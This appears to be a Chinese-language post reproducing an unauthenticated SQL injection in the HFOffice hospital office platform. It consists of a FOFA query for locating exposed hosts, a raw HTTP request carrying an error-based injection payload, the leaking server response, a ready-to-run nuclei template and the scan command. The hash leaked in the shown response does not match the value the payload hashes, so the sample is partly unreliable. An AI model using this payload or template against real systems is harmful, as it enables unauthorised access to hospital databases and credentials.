HFOffice医微云SQL注入漏洞复现 nuclei poc

title="HFOffice"

GET /api/switch-value/list?sorts=%5B%7B%22Field%22:%221-CONVERT(VARCHAR(32),%20HASHBYTES(%27MD5%27,%20%271234%27),%202);%22%7D%5D&conditions=%5B%5D&_ZQA_ID=4dc296c6c69905a7 HTTP/1.1Host: x.x.x.xUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36Connection: closeAccept: */*Accept-Language: enAccept-Encoding: gzip

HTTP/1.1 400 Bad RequestConnection: closeContent-Length: 64Cache-Control: privateContent-Type: text/plain; charset=utf-8Date: Mon, 06 Nov 2023 09:26:23 GMTServer: Microsoft-IIS/10.0X-Aspnet-Version: 4.0.30319X-Powered-By: ASP.NET

在将 varchar 值 'E10ADC3949BA59ABBE56E057F20F883E' 转换成数据类型 int 时失败。

id: hongfan-hfoffice-list-sqli

info:  name: 红帆OA HFOffice list处存在SQL注入漏洞  author: fgz  severity: high  description: '红帆HFOffice医微云是广州红帆科技有限公司研发的专注医疗行政办公管理，与企业微信全方位结合，提供协同办公、知识库、专家系统、BI等应用，进一步帮助医院移动办公落地，成就面向医院管理的“智慧管理”。平台list接口处存在SQL注入漏洞，未经身份认证的攻击者可通过该漏洞获取数据库敏感信息及凭证，最终可能导致服务器失陷。'  tags: 2023,HFOffice,sqli  metadata:    max-request: 3    fofa-query: title="HFOffice"    verified: true

http:  - method: GET    path:      - "{{BaseURL}}/api/switch-value/list?sorts=%5B%7B%22Field%22:%221-CONVERT(VARCHAR(32),%20HASHBYTES(%27MD5%27,%20%271234%27),%202);%22%7D%5D&conditions=%5B%5D&_ZQA_ID=4dc296c6c69905a7"    matchers:      - type: word        words:          - "81DC9BDB52D04DC20036DBD8313ED055"        condition: and

.nuclei.exe -t mypoc/红帆/hongfan-ioffice-list-sqli.yaml -l data/1.txt